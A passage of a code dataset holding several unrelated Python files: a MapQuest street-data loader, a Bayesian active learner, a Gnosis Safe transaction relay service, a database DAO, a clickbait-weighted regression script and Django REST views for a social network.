street_categories\n self.__LINK_PREFIX = \"http://open.mapquestapi.com/xapi/api/0.6/way[highway=*][bbox=\"\n self.__LINK_POSTFIX = \"]?key=\"\n\n def _get_api_key(self):\n cwenv = environ.Env(MAPQUEST_API_KEY=(str, 'api_key'))\n root = environ.Path(os.getcwd())\n environ.Env.read_env(root('.env'))\n return cwenv('MAPQUEST_API_KEY')\n\n def _request(self, box):\n postfix = self.to_mapquest_format(\n box) + self.__LINK_POSTFIX + self.apiKey\n url = self.__LINK_PREFIX + postfix\n response, content = httplib2.Http().request(url)\n if response.get('status') == '200' and response.get(\n 'content-type',\n '').find('text/xml') != -1:\n return ElementTree.fromstring(content)\n return None\n\n def load_data(self, bbox):\n self._load_data(bbox)\n return self.streets\n\n\n @staticmethod\n def to_mapquest_format(bbox):\n return str(bbox.left) + \",\" + str(bbox.bottom) + \",\" + str(bbox.right) + \",\" + str(bbox.top)\n\n def _load_data(self, bbox):\n tree = self._request(bbox)\n if tree is not None:\n self._parse_tree(tree)\n self._filter_crosswalks(tree)\n\n def _filter_crosswalks(self, tree):\n for node in tree.iter('node'):\n for tag in node.iter('tag'):\n if self._is_crosswalk(tag):\n self.crosswalks.append(Node(node.get('lat'), node.get('lon')))\n\n def _parse_tree(self, tree):\n node_map = self._get_node_map(tree)\n for way in tree.iter('way'):\n for tag in way.iter('tag'):\n for category in self.street_categories:\n if self._is_in_category(tag, category):\n results = self._parse_way(way, node_map)\n self.streets += results\n\n @staticmethod\n def _is_in_category(tag, category):\n return 
str(tag.attrib) == \"{'k': 'highway', 'v': '\" + category + \"'}\"\n\n @staticmethod\n def _is_crosswalk(tag):\n return str(tag.attrib) == \"{'k': 'highway', 'v': 'crossing'}\"\n\n def _parse_way(self, way, node_map):\n result = []\n nodes = self._create_node_list(way, node_map)\n for i in range(len(nodes) - 1):\n me = nodes[i]\n next_node = nodes[i + 1]\n\n street = self._create_street(way)\n street.nodes.append(me)\n street.nodes.append(next_node)\n result.append(street)\n\n return result\n\n @staticmethod\n def _create_street(way):\n ident = way.get('id')\n name = \"\"\n highway = \"\"\n\n for tag in way.iter('tag'):\n if tag.attrib['k'] == 'name':\n name = tag.attrib['v']\n if tag.attrib['k'] == 'highway':\n highway = tag.attrib['v']\n\n street = Street.from_info(name, ident, highway)\n return street\n\n @staticmethod\n def _create_node_list(way, node_map):\n nodes = []\n for node in way.iter('nd'):\n nid = node.get('ref')\n if nid in node_map:\n nodes.append(node_map[nid])\n return nodes\n\n @staticmethod\n def _get_node_map(tree):\n nodes = {}\n for node in tree.iter('node'):\n nodes[node.get('id')] = Node(node.get('lat'), node.get('lon'), node.get('id'))\n return nodes\n","sub_path":"src/data/mapquest_api.py","file_name":"mapquest_api.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"424643146","text":"import numpy as np\nimport models.utils as utils\n\n\nclass ConceptActiveLearner:\n def __init__(self, n_features=3, hyp_space_type=\"boundary\",\n sampling=\"max\", true_hyp=None):\n assert(n_features > 0)\n\n self.d = [] # observed data points\n self.n_obs = 0 # number of observed data points\n self.n_labels = 2 # number of possible y values\n self.n_features = n_features\n\n if hyp_space_type == \"boundary\":\n self.hyp_space = utils.create_boundary_hyp_space(self.n_features)\n elif hyp_space_type == \"line\":\n self.hyp_space = utils.create_line_hyp_space(self.n_features)\n\n self.n_hyp = len(self.hyp_space)\n self.prior = np.array([1 / self.n_hyp\n for _ in range(self.n_hyp)])\n self.posterior = self.prior\n\n if true_hyp is not None:\n self.true_hyp = true_hyp\n self.true_hyp_idx = \\\n np.where([np.all(true_hyp == hyp)\n for hyp in self.hyp_space])[0]\n else:\n self.true_hyp_idx = np.random.randint(self.n_hyp)\n self.true_hyp = self.hyp_space[self.true_hyp_idx]\n\n self.posterior_true_hyp = np.ones(self.n_features + 1)\n self.posterior_true_hyp[0] = 1 / self.n_hyp\n self.first_feature_prob = np.zeros(n_features)\n self.sampling = sampling\n\n def likelihood(self, x, y):\n \"\"\"Calculates the likelihood of observing the datapoint x\"\"\"\n\n # assert np.logical_or(np.isclose(y, 0.0), np.isclose(y, 1.0))\n # assert y == 0.0 or y == 1.0\n\n lik = np.zeros(len(self.hyp_space))\n for i, hyp in enumerate(self.hyp_space):\n if hyp[x] == y:\n lik[i] = 1\n else:\n lik[i] = 0\n return lik\n\n def observe(self, x, y):\n \"\"\"Calculate the posterior based on observing x\"\"\"\n\n # assert np.logical_or(np.isclose(y, 0.0), np.isclose(y, 1.0))\n # assert y == 0 or y == 1\n\n lik = self.likelihood(x, y)\n posterior = np.array(self.posterior) * np.array(lik)\n if np.sum(posterior) != 0:\n return posterior / np.sum(posterior)\n else:\n return posterior\n\n def update(self, x, y):\n \"\"\"Updates the model based on observing x using Bayesian inference\"\"\"\n\n # assert np.logical_or(np.isclose(y, 0.0), np.isclose(y, 1.0))\n # assert y == 0 or y == 1\n\n # lik = self.likelihood(x, y)\n 
self.posterior = self.observe(x, y)\n\n def entropy(self, p):\n \"\"\"Calculate the entropy of a random variable\"\"\"\n\n # print(np.sum(p))\n # assert np.sum(p) == 1.0 # checks for valid pmf\n\n p = p[np.nonzero(p)] # remove all zero probability hypotheses\n entropy = -1 * np.sum(np.log(p) * p)\n return entropy\n\n def information_gain(self, x, y):\n \"\"\"Calulate the amount of information gain from a single observation\"\"\"\n entropy_prior = self.entropy(self.posterior)\n posterior_new = self.observe(x, y)\n entropy_post = self.entropy(posterior_new)\n information_gain = entropy_prior - entropy_post\n return information_gain\n\n def expected_information_gain(self, x):\n \"\"\"Calculate the expected information gain across all outcomes\"\"\"\n eig_vec = np.zeros(self.n_labels)\n eig_weights = np.zeros(self.n_labels)\n for i, y in enumerate(range(self.n_labels)):\n # calculate information gain\n eig_vec[i] = self.information_gain(x, y)\n\n # calculate posterior prob consistent with this observation\n eig_idx = np.where(self.hyp_space[:, x] == y)\n eig_weights[i] = np.sum(self.posterior[eig_idx])\n\n return np.dot(eig_vec, eig_weights)\n\n def run(self, n_steps=None):\n \"\"\"Runs the active learner until the true hypothesis is discovered\"\"\"\n\n # set n steps to be the number of features if not None\n if n_steps is None:\n n_steps = self.n_features\n\n queries = np.arange(self.n_features)\n\n # while np.nonzero(self.posterior)[0].shape[0] > 1:\n while np.count_nonzero(self.posterior) > 1 and n_steps > 0:\n eig = np.zeros_like(queries, dtype=np.float)\n for i, query in enumerate(queries):\n eig[i] = self.expected_information_gain(query)\n\n # save prob of selecting features\n if self.n_obs == 0:\n self.first_feature_prob = eig / np.sum(eig)\n\n query = -1\n # select query with maximum expected information gain\n if self.sampling == \"max\":\n query = queries[np.random.choice(\n np.where(eig == np.amax(eig))[0])]\n else:\n # sample proportionally\n query = np.random.choice(queries,\n p=np.abs(eig / np.sum(eig)))\n\n # update model\n query_y = self.true_hyp[query]\n self.update(query, query_y)\n\n # increment number of observations and decrease number of steps\n self.n_obs += 1\n n_steps -= 1\n\n # save current posterior of true hypothesis\n self.posterior_true_hyp[self.n_obs] = \\\n self.posterior[self.true_hyp_idx]\n\n return self.n_obs, self.posterior_true_hyp, self.first_feature_prob\n\n\nif __name__ == \"__main__\":\n hyp_space_type = \"boundary\"\n n_features = 3\n sampling = \"max\"\n\n # feature, label pairs\n xs = [0, 0, 1, 1, 2, 2]\n ys = [0, 1, 0, 1, 0, 1]\n\n x = 0\n y = 1\n\n al = ActiveLearner(n_features, hyp_space_type, sampling=sampling)\n active_learning_prob_one = np.array([\n al.expected_information_gain(x) for x in range(n_features)])\n\n # normalize\n active_learning_prob_one = active_learning_prob_one / \\\n np.sum(active_learning_prob_one)\n\n # perform update\n al.update(x=x, y=y)\n active_learning_prob_two = np.array([\n al.expected_information_gain(x) for x in range(n_features)])\n\n print(active_learning_prob_two)\n","sub_path":"models/concept_active_learner.py","file_name":"concept_active_learner.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179934444","text":"from typing import Tuple, Union\n\nfrom django_eth.constants import NULL_ADDRESS\nfrom gnosis.safe.safe_service import (GasPriceTooLow, InvalidRefundReceiver,\n SafeService, 
SafeServiceProvider)\n\nfrom safe_relay_service.gas_station.gas_station import (GasStation,\n                                                         GasStationProvider)\nfrom safe_relay_service.tokens.models import Token\n\n\nclass RelayServiceException(Exception):\n    pass\n\n\nclass RefundMustBeEnabled(RelayServiceException):\n    pass\n\n\nclass InvalidGasToken(RelayServiceException):\n    pass\n\n\nclass SignaturesNotFound(RelayServiceException):\n    pass\n\n\nclass RelayServiceProvider:\n    def __new__(cls):\n        if not hasattr(cls, 'instance'):\n            cls.instance = RelayService(SafeServiceProvider(), GasStationProvider())\n        return cls.instance\n\n    @classmethod\n    def del_singleton(cls):\n        if hasattr(cls, \"instance\"):\n            del cls.instance\n\n\nclass RelayService:\n    def __init__(self, safe_service: SafeService, gas_station: GasStation):\n        self.safe_service = safe_service\n        self.gas_station = gas_station\n\n    def __getattr__(self, attr):\n        return getattr(self.safe_service, attr)\n\n    def _check_refund_receiver(self, refund_receiver: str) -> bool:\n        \"\"\"\n        We only support tx.origin as refund receiver right now\n        In the future we can also accept transactions where it is set to our service account to receive the payments.\n        This would prevent anybody from front-running our service\n        \"\"\"\n        return refund_receiver == NULL_ADDRESS\n\n    # FIXME Estimate everything in one method, same with Safe info\n    def estimate_tx_gas_price(self, gas_token: Union[str, None] = None):\n        gas_token = gas_token or NULL_ADDRESS\n        gas_price_fast = self.gas_station.get_gas_prices().fast\n\n        if gas_token != NULL_ADDRESS:\n            try:\n                gas_token_model = Token.objects.get(address=gas_token, gas=True)\n                return gas_token_model.calculate_gas_price(gas_price_fast)\n            except Token.DoesNotExist:\n                raise InvalidGasToken('Gas token %s not valid' % gas_token)\n        else:\n            return gas_price_fast\n\n    def send_multisig_tx(self,\n                         safe_address: str,\n                         to: str,\n                         value: int,\n                         data: bytes,\n                         operation: int,\n                         safe_tx_gas: int,\n                         data_gas: int,\n                         gas_price: int,\n                         gas_token: str,\n                         refund_receiver: str,\n                         signatures: bytes,\n                         tx_sender_private_key=None,\n                         tx_gas=None) -> Tuple[str, Any]:\n        \"\"\"\n        This function calls the `send_multisig_tx` of the SafeService, but has some limitations to prevent abusing\n        the relay\n        :return: Tuple(tx_hash, tx)\n        :raises: InvalidMultisigTx: If user tx cannot go through the Safe\n        \"\"\"\n\n        data = data or b''\n        gas_token = gas_token or NULL_ADDRESS\n        refund_receiver = refund_receiver or NULL_ADDRESS\n        to = to or NULL_ADDRESS\n\n        # Make sure refund receiver is set to 0x0 so that the contract refunds the gas costs to tx.origin\n        if not self._check_refund_receiver(refund_receiver):\n            raise InvalidRefundReceiver(refund_receiver)\n\n        # if gas_price == 0:\n        #    raise RefundMustBeEnabled('Tx internal gas price cannot be 0')\n\n        threshold = self.retrieve_threshold(safe_address)\n        number_signatures = len(signatures) // 65 # One signature = 65 bytes\n        if number_signatures < threshold:\n            raise SignaturesNotFound('Need at least %d signatures' % threshold)\n\n        # If gas_token is specified, we see if the `gas_price` matches the current token value and use as the\n        # external tx gas the fast gas price from the gas station.\n        # If not, we just use the internal tx gas_price for the gas_price\n        # Gas price must be at least >= standard gas price\n        current_gas_prices = self.gas_station.get_gas_prices()\n        current_fast_gas_price = current_gas_prices.fast\n        current_standard_gas_price = current_gas_prices.standard\n\n        if gas_token != NULL_ADDRESS:\n            try:\n                gas_token_model = 
Token.objects.get(address=gas_token, gas=True)\n                estimated_gas_price = gas_token_model.calculate_gas_price(current_standard_gas_price)\n                if gas_price < estimated_gas_price:\n                    raise GasPriceTooLow('Required gas-price>=%d to use gas-token' % estimated_gas_price)\n                # We use gas station tx gas price. We cannot use internal tx's because it is calculated\n                # based on the gas token\n            except Token.DoesNotExist:\n                raise InvalidGasToken('Gas token %s not valid' % gas_token)\n        # else:\n        #    if gas_price < current_standard_gas_price:\n        #        # raise GasPriceTooLow('Required gas-price>=%d' % current_standard_gas_price)\n\n        # We use the fast tx gas price; otherwise txs could get stuck\n        tx_gas_price = current_fast_gas_price\n\n        return self.safe_service.send_multisig_tx(\n            safe_address,\n            to,\n            value,\n            data,\n            operation,\n            safe_tx_gas,\n            data_gas,\n            gas_price,\n            gas_token,\n            refund_receiver,\n            signatures,\n            tx_sender_private_key=tx_sender_private_key,\n            tx_gas=tx_gas,\n            tx_gas_price=tx_gas_price)\n\n    def send_multisig_subtx(self,\n                            subscriptions_to_execute: Any,\n                            tx_sender_private_key=None,\n                            tx_gas=None) -> Tuple[str, Any]:\n        \"\"\"\n        This function calls the `send_multisig_subtx` of the SafeService, but has some limitations to prevent abusing\n        the relay\n        :return: Tuple(tx_hash, tx)\n        :raises: InvalidMultisigTx: If user tx cannot go through the Safe\n        \"\"\"\n\n        current_gas_prices = self.gas_station.get_gas_prices()\n        current_fast_gas_price = current_gas_prices.fast\n        current_standard_gas_price = current_gas_prices.standard\n\n        tx_gas_price = current_fast_gas_price\n\n        return self.safe_service.send_multisig_subtx(\n            subscriptions_to_execute,\n            tx_sender_private_key=tx_sender_private_key,\n            tx_gas=tx_gas,\n            tx_gas_price=tx_gas_price)\n","sub_path":"safe_relay_service/relay/relay_service.py","file_name":"relay_service.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"511281413","text":"from typing import Sequence, Iterable\n\nfrom pypika import Query\n\nfrom app.models import Relic\nfrom app.database import open_cursor\n\nimport dataclasses\n\n\nclass RelicDao:\n    def insert_all(self, relics: Sequence[Relic]):\n        raise NotImplementedError\n\n    def get_all(self) -> Sequence[Relic]:\n        raise NotImplementedError\n\n\nclass RelicSqlDao(RelicDao):\n    def get_all(self) -> Sequence[Relic]:\n        relic_table = Relic.table()\n        query = Query.from_(relic_table).select('*')\n\n        with open_cursor() as (cursor, connection):\n            cursor.execute(str(query))\n            return [Relic(**row) for row in cursor]\n\n    def insert_all(self, relics: Iterable[Relic]):\n        if not relics:\n            return []\n\n        fields = Relic.fields()\n\n        query = Query.into(Relic.table()) \\\n            .columns(*fields) \\\n\n        for relic in relics:\n            query = query.insert(*(getattr(relic, field) for field in fields))\n\n        with open_cursor() as (cursor, connection):\n            cursor.execute(str(query))\n            connection.commit()\n","sub_path":"app/dao/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"584209164","text":"import pandas as pd\nimport numpy as np\nimport sklearn.linear_model\nimport sklearn.model_selection\n\nclickbait_percentage = pd.read_csv('percents.csv')\ndic_source_clickbait = {row['source']: row['percent_clickbait'] for i, row in clickbait_percentage.iterrows()}\naverage_clickbait = clickbait_percentage.percent_clickbait.sum() / len(clickbait_percentage)\ndata = pd.read_csv('edata_classified.csv')\n\ndef 
add_clickbait(source):\n    if source.startswith('www.'):\n        source = source[4:]\n    if source in dic_source_clickbait:\n        return dic_source_clickbait[source]\n    return average_clickbait\n    \ndata['clickbait_percentage'] = data['source'].apply(add_clickbait)\n\n\ndef get_features(data, source_len = 724):\n    \"\"\"\n    features for claims\n    \"\"\"\n    dic_f = {} # claimCount -> features\n    \n    for i in range(len(data)):\n        row = data.iloc[i]\n        stance = row['articleHeadlineStance']\n        stance_id = -1 if stance == 'against' else 0 if stance == 'observing'\\\n            else 1\n        source = row.sourceCount - 1 # 1-index to 0-index\n        claim = row.claimCount\n        \n        if claim not in dic_f: dic_f[claim] = np.zeros((source_len,))\n        dic_f[claim][source] = stance_id\n        \n    #claims = dic_f.keys()\n    return dic_f\n\n\ndef extract_truth_labels(data):\n    claims = sorted(data.claimCount.unique().tolist())\n    l = [''] * len(claims)\n    for i in range(len(data)):\n        row = data.iloc[i]\n        truth = row.claimTruth\n        claim = row.claimCount\n        claimIdx = claims.index(claim)\n        l[claimIdx] = truth \n    return (claims, l)\n\n\ndef build_veracity_prediction_matrix():\n    dic_f = get_features(data)\n    \n    (claims, veracity) = extract_truth_labels(data)\n    \n    n = len(claims)\n    m = next(iter(dic_f.values())).shape[0]\n    \n    F = np.zeros((n, m))\n    for i, c in enumerate(claims): F[i, :] = dic_f[c]\n    \n    return (claims, F, veracity)\n\n\nclaims, F, vera = build_veracity_prediction_matrix()\nclf = sklearn.linear_model.LogisticRegression()\n# This is the average accuracy for the original matrix (using cross validation)\nprint(np.mean(sklearn.model_selection.cross_val_score(clf, F, vera, cv=8)))\n\n# now slap the percentage of non-clickbait into the feature matrix\nG = F.copy()\nfor i, row in data.iterrows():\n    source_index = row['sourceCount'] - 1\n    percent_clickbait = row['clickbait_percentage']\n    G[:, source_index] = F[:, source_index] * (1 - percent_clickbait * 0.01)\n    \n\nclf_g = sklearn.linear_model.LogisticRegression()\n# This is the average accuracy for the matrix with clickbait slapped\nprint(np.mean(sklearn.model_selection.cross_val_score(clf_g, G, vera, cv=8)))\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"407394862","text":"from rest_framework import generics\nfrom rest_framework.views import APIView\nfrom .serializers import *\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly\nfrom rest_framework.response import Response\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.db.models import Sum\n\n\nclass PostListAPIView(generics.ListAPIView):\n    queryset = Post.objects.all()\n    serializer_class = PostSerializer\n    permission_classes = []\n\n    def get(self, request, *args):\n        content_type = request.GET.get(\"content_type\") # Object's type that contains the posts\n        object_id = request.GET.get(\"object_id\") # ID of that object\n        post_id = request.GET.get(\"post_id\") # Get single post\n\n        if post_id:\n            try:\n                queryset = self.get_queryset().get(id=post_id)\n                serializer = self.serializer_class(queryset)\n                return Response({\"data\": serializer.data})\n            except:\n                return Response({\"data\": \"Cannot get the post by provided id\"})\n\n        elif content_type == 'News':\n            queryset = self.get_queryset().filter(\n                Q(related_community__followers=request.user) | Q(creator__profile__followers__user=request.user) | Q(\n                    creator=request.user)).distinct()\n        elif content_type == 
'Community':\n            queryset = self.get_queryset().filter(related_community=Community.objects.get(id=object_id))\n        elif content_type == 'User':\n            queryset = self.get_queryset().filter(creator=User.objects.get(id=object_id))\n        else:\n            return Response({\"data\": \"Request has no 'content_type' or 'object_id' field\"})\n\n        serializer = self.serializer_class(queryset, many=True)\n        page = self.paginate_queryset(serializer.data)\n        return self.get_paginated_response(page)\n\n\nclass Rating(APIView):\n    permission_classes = [IsAuthenticatedOrReadOnly]\n    model_by_type = {'post': Post, 'comment': Comment}\n    vote_types = {'like': 1, 'dislike': -1}\n\n    def get(self, request): # Getting rating count for Post or Comment object\n        content_type = ContentType.objects.get(model=request.data.get(\"content_type\"))\n        object_id = request.GET.get(\"object_id\")\n        try:\n            rating_count = LikeDislike.objects.filter(\n                content_type=content_type, object_id=object_id).aggregate(\n                Sum('vote')).get('vote__sum') or 0\n            return Response({\"rating_count\": rating_count})\n        except:\n            return Response({\"errors\": \"Parameters must contain 'content_type' and 'object_id' fields\"})\n\n    def post(self, request):\n        content_type = ContentType.objects.get(model=request.data.get(\"content_type\"))\n        object_id = request.data.get(\"object_id\")\n        vote_type = self.vote_types.get(request.data.get(\"vote_type\"))\n        try:\n            like_dislike = LikeDislike.objects.get(user=request.user, content_type=content_type, object_id=object_id)\n            if like_dislike.vote != vote_type:\n                like_dislike.vote = vote_type\n                like_dislike.save(update_fields=['vote'])\n            else:\n                like_dislike.delete()\n        except:\n            LikeDislike.objects.create(user=request.user, vote=vote_type, content_type=content_type,\n                                       object_id=object_id)\n        # Synchronizing the rating\n        # obj = Comment.objects.get(pk=49)\n        obj = self.model_by_type.get(request.data.get(\"content_type\")).objects.get(id=object_id)\n        obj.rating = LikeDislike.objects.filter(\n            content_type=content_type, object_id=object_id).aggregate(\n            Sum('vote')).get('vote__sum') or 0\n        obj.save()\n        return Response({\"data\": \"You voted this\"})\n\n\nclass MyPostListApiView(generics.ListAPIView):\n    queryset = Post.objects.all()\n    serializer_class = PostSerializer\n    permission_classes = []\n\n    def list(self, request, *args, **kwargs):\n        queryset = self.get_queryset().filter(creator=request.user)\n        serializer = self.serializer_class(queryset, many=True)\n        page = self.paginate_queryset(serializer.data)\n        return self.get_paginated_response(page)\n\n\nclass PostCreateAPIView(generics.CreateAPIView):\n    serializer_class = PostPostSerializer\n    permission_classes = [IsAuthenticated]\n\n    def create(self, request, *args, **kwargs):\n        if request.data.get(\"community\"):\n            related_community = Community.objects.get(id=request.data.get(\"community\"))\n            post = self.serializer_class(data=request.data)\n            if post.is_valid():\n                if request.user.id == related_community.creator.id:\n                    post.save(creator=request.user, related_community=related_community)\n                    return Response({\"data\": \"Post created successfully\"})\n                else:\n                    return Response({\"data\": \"You aren't the community creator\"})\n        else:\n            reposted = Post.objects.get(id=request.data.get(\"reposted_id\"))\n\n            post = self.serializer_class(data=request.data)\n            if post.is_valid():\n                post.save(creator=request.user, reposted=reposted, reposted_community=reposted.related_community,\n                          reposted_creator=reposted.creator)\n                return Response({\"data\": \"Post created 
successfully\"})\n\n\nclass CommentListAPIView(generics.ListAPIView):\n    queryset = Comment.objects.all()\n    serializer_class = CommentSerializer\n    permission_classes = []\n\n    def list(self, request, *args, **kwargs):\n        comment_id = request.GET.get(\"comment_id\")\n        post_id = request.GET.get(\"post_id\")\n        if comment_id:\n            queryset = self.get_queryset().get(id=comment_id)\n            serializer = self.serializer_class(queryset)\n        else:\n            queryset = self.get_queryset().filter(related_post=Post.objects.get(id=post_id))\n            serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n\nclass CommentCreateAPIView(generics.CreateAPIView):\n    serializer_class = CommentPostSerializer\n    permission_classes = [IsAuthenticated]\n\n    def create(self, request, *args, **kwargs):\n        comment = self.serializer_class(data=request.data)\n        if comment.is_valid():\n            comment.save(sender=request.user, related_post=Post.objects.get(id=request.data.get(\"related_post\")))\n            return Response({\"data\": \"Comment sent successfully\"})\n\n\nclass DialogCreateAPIView(generics.CreateAPIView):\n    serializer_class = DialogPostSerializer\n    permission_classes = [IsAuthenticated]\n\n    def create(self, request, *args, **kwargs):\n        dialog = self.serializer_class(data=request.data)\n        if dialog.is_valid():\n            dialog.save(creator=request.user, invited_users=User.objects.filter(id=request.data.get(\"id\")))\n            return Response({\"data\": \"Dialog created successfully\"})\n\n\nclass DialogListAPIView(generics.ListAPIView):\n    queryset = Dialog.objects.all()\n    serializer_class = DialogSerializer\n    permission_classes = [IsAuthenticated]\n\n    def list(self, request, *args, **kwargs):\n        queryset = self.get_queryset().filter(Q(creator=request.user) | Q(invited_users=request.user))\n        serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n\nclass MessageListAPIView(generics.ListAPIView):\n    queryset = Message.objects.all()\n    serializer_class = MessageSerializer\n    permission_classes = [IsAuthenticated]\n\n    # The dialog id arrives as a query parameter on the GET request\n    def list(self, request, *args, **kwargs):\n        dialog = Dialog.objects.get(id=request.GET.get(\"dialog\"))\n        if bool(dialog.creator == request.user) | dialog.invited_users.filter(id=request.user.id).exists():\n            queryset = self.get_queryset().filter(dialog=dialog)\n            serializer = self.serializer_class(queryset, many=True)\n            return Response({\"data\": serializer.data})\n        else:\n            return Response({\"data\": \"You aren't invited in this dialog\"})\n\n\nclass MessageCreateAPIView(generics.CreateAPIView):\n    serializer_class = MessagePostSerializer\n    permission_classes = [IsAuthenticated]\n\n    def create(self, request, *args, **kwargs):\n        dialog = Dialog.objects.get(id=request.data.get(\"dialog\"))\n        message = self.serializer_class(data=request.data)\n        if message.is_valid():\n            if bool(dialog.creator == request.user) | dialog.invited_users.filter(id=request.user.id).exists():\n                message.save(sender=request.user, dialog=dialog)\n                dialog.last_message = request.data.get(\"text\")\n                dialog.save()\n                return Response({\"data\": \"Message sent successfully\"})\n\n\nclass CommunityListAPIView(generics.ListAPIView):\n    queryset = Community.objects.all()\n    serializer_class = CommunitySerializer\n    permission_classes = []\n\n    def list(self, request, *args, **kwargs): # An optional search term arrives as a query parameter\n        try:\n            search = request.GET.get(\"search\")\n            queryset = 
Community.objects.filter(Q(title__icontains=search) | Q(description__icontains=search))\n        except:\n            queryset = self.get_queryset()\n        serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n    def patch(self, request): # Find user's subscriptions\n        user = User.objects.get(id=request.data.get('user'))\n        queryset = Community.objects.filter(followers=user)\n        serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n\nclass CommunityPostListAPIView(generics.ListAPIView):\n    queryset = Post.objects.all()\n    serializer_class = PostSerializer\n    permission_classes = []\n\n    def list(self, request, *args, **kwargs):\n        community = Community.objects.get(id=request.GET.get(\"community\"))\n        queryset = self.get_queryset().filter(related_community=community)\n        serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n\nclass CommunityCreateAPIView(generics.CreateAPIView):\n    serializer_class = CommunityPostSerializer\n    permission_classes = [IsAuthenticated]\n\n    def create(self, request, *args, **kwargs):\n        community = self.serializer_class(data=request.data)\n        if community.is_valid():\n            Photo.objects.create()\n            community.save(creator=request.user)\n            return Response({\"data\": \"Community created successfully\"})\n        return Response({\"data\": \"Form isn't valid\"})\n\n\nclass FriendListAPIView(generics.ListAPIView):\n    queryset = Profile.objects.all()\n    serializer_class = ProfileSerializer\n    permission_classes = [IsAuthenticated]\n\n    def list(self, request, *args, **kwargs):\n        search = request.GET.get(\"search\")\n        queryset = self.get_queryset().filter(Q(user__username__icontains=search.strip(' ')) |\n                                              Q(user__email__icontains=search.strip(' ')))\n        serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n\nclass FollowCommunity(APIView):\n    permission_classes = [IsAuthenticated]\n\n    def post(self, request):\n        community = Community.objects.get(id=request.data.get(\"community\"))\n        if not community.followers.filter(id=request.user.id).exists():\n            community.followers.add(request.user)\n            return Response({\"data\": \"You followed this community\"})\n        return Response({\"data\": \"You've already followed this community\"})\n\n    def put(self, request): # We're checking whether user already followed this community\n        community = Community.objects.get(id=request.data.get(\"community\"))\n        if community.followers.filter(id=request.user.id).exists():\n            return Response({\"data\": True})\n        else:\n            return Response({\"data\": False})\n\n    def patch(self, request): # Unfollow community\n        community = Community.objects.get(id=request.data.get(\"community\"))\n        if community.followers.filter(id=request.user.id).exists():\n            community.followers.remove(request.user)\n            return Response({\"data\": \"You unfollowed this community\"})\n        else:\n            return Response({\"data\": \"You haven't followed this community\"})\n\n\nclass FollowersListAPIView(generics.ListAPIView):\n    queryset = FriendRequest.objects.all()\n    serializer_class = FriendRequestSerializer\n    permission_classes = [IsAuthenticated]\n\n    def list(self, request, *args, **kwargs):\n        queryset = self.get_queryset().filter(receiver=request.user)\n        serializer = self.serializer_class(queryset, many=True)\n        return Response({\"data\": serializer.data})\n\n\nclass FollowUser(APIView):\n    permission_classes = [IsAuthenticated]\n\n    def post(self, request):\n        user = 
User.objects.get(id=request.data.get(\"user\"))\n        if not FriendRequest.objects.filter(Q(user=request.user) & Q(receiver=user)).exists():\n            friend_request = FriendRequest.objects.create(user=request.user, receiver=user)\n            request.user.profile.followers.add(friend_request)\n            user.profile.followers.add(friend_request)\n            return Response({\"data\": \"You followed this user\"})\n        return Response({\"data\": \"You've already followed this user\"})\n\n    def put(self, request): # We're checking whether user already followed\n        user = User.objects.get(id=request.data.get(\"user\"))\n        if user.profile.followers.filter(Q(user=request.user) & Q(receiver=user)).exists():\n            return Response({\"data\": True})\n        else:\n            return Response({\"data\": False})\n\n    def patch(self, request): # Unfollow user\n        user = User.objects.get(id=request.data.get(\"user\"))\n        if user.profile.followers.filter(Q(user=request.user) & Q(receiver=user)).exists():\n            FriendRequest.objects.get(user=request.user, receiver=user).delete()\n            return Response({\"data\": \"You unfollowed this user\"})\n        else:\n            return Response({\"data\": \"You haven't followed this user\"})\n\n\nclass UserResponseRequest(APIView):\n    permission_classes = [IsAuthenticated]\n\n    def post(self, request):\n        friend_request = FriendRequest.objects.get(id=request.data.get(\"friend_request\"))\n        if friend_request.receiver.id == request.user.id:\n            friend_request.accepted = True\n            friend_request.receiver.profile.friends.add(friend_request.user)\n            friend_request.save()\n            return Response({\"data\": \"Friend request accepted\"})\n        return Response({\"data\": \"You aren't this request receiver\"})\n\n    def patch(self, request):\n        friend_request = FriendRequest.objects.get(id=request.data.get(\"friend_request\"))\n        if friend_request.receiver.id == request.user.id:\n            friend_request.accepted = False\n            friend_request.receiver.profile.friends.remove(friend_request.user)\n            friend_request.save()\n            return Response({\"data\": \"Friend request refused\"})\n        return Response({\"data\": \"You aren't this request receiver\"})\n\n\nclass GetCommunity(APIView):\n    permission_classes = []\n\n    def get(self, request):\n        community = Community.objects.get(id=request.GET.get(\"community\"))\n        serializer = CommunitySerializer(community)\n        return Response({\"data\": serializer.data})\n\n\nclass GetProfile(APIView):\n    permission_classes = [IsAuthenticated]\n\n    def get(self, request):\n        user_id = request.GET.get(\"user\")\n        if user_id:\n            user = User.objects.get(id=user_id)\n            profile = Profile.objects.get(user=user)\n            if user.id == request.user.id:\n                current_profile = True\n            else:\n                current_profile = False\n        else:\n            profile = Profile.objects.get(user=request.user)\n            current_profile = True\n        serializer = ProfileSerializer(profile)\n        return Response({\"data\": serializer.data, \"current_profile\": current_profile})\n\n\nclass Test(APIView):\n    permission_classes = [IsAuthenticated]\n\n    def post(self, request):\n        return Response({\"data\": 